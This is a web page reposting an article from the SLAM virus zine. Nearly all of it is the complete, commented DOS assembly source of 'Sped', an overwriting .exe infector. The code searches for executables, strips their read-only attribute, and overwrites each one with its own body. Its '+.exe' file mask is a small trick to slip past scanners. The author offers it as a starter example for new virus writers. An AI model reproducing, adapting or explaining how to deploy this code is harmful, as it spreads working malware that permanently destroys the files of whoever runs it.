Copy Link
Add to Bookmark
Report

SLAM2.011: Sped Disassembly by DarkChasm [SLAM]

eZine's profile picture
Published in 
Slam
 · 2 years ago

; 
; Sped
; (C) DarkChasm [SLAM]
;
; ORIGIN: USA
; AUTHOR: DarkChasm
; GROUP : SLAM
; TYPE : Overwriting, exe infector, can infect Read-Only files (makes them
; archive only), error checking
;
; Ahh... My first virus. Don't be to hard on me. This should help some
; people who are just starting out. I tried to comment the source as good
; as possible.
;
; DarkChasm


Code Segment
assume cs:virus, ds:virus
org 100h

virus proc near

start:
mov ah,4Eh ; find first file function
xor cx,cx ; file with any attributes
lea dx, file_mask ; move offset of file_mask to ds:dx
dec byte ptr [file_mask] ; turn the + into a *
int 21h ; do it ; do it
inc byte ptr [file_mask] ; turn the * back into a +
jc exit ; if something goes wrong exit

clear_file_attributes:
mov ax, 4301h ; mov 43h to ah and 01h to al
mov cx, 20h ; make it an archive only file
mov dx, 9eh ; name of the file in DTA
int 21h ; do it
jmp open_file ; jump to open_file

find_next_file:
mov ah, 4Fh ; move 4Fh to ah (find next file)
int 21h ; do it
jc exit ; something go wrong? If so exit
call clear_file_attributes ; do clear_file_attributes

open_file:
mov ax, 3D02h ; move 3Dh to ah and 02h to al
mov dx, 9eh ; name of the file in DTA
int 21h ; do it

infect_file:
xchg bx, ax ; trade the contents of ax and bx
mov ah, 40h ; move 40h to ah
mov cx, offset vend - offset start ; put the size of virus in cx
lea dx, start ; put the offset of start in ds:dx
int 21h ; do it

close_file:
mov ah, 3Eh ; move 3Eh to ah
int 21h ; do it
jmp find_next_file ; jump to find_next_file

exit:
int 20h ; exit

file_mask db '+.exe',0
Virus_Signature db 'Sped (C) DarkChasm [SLAM]',0
vend label near
virus endp
code ends
end start

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT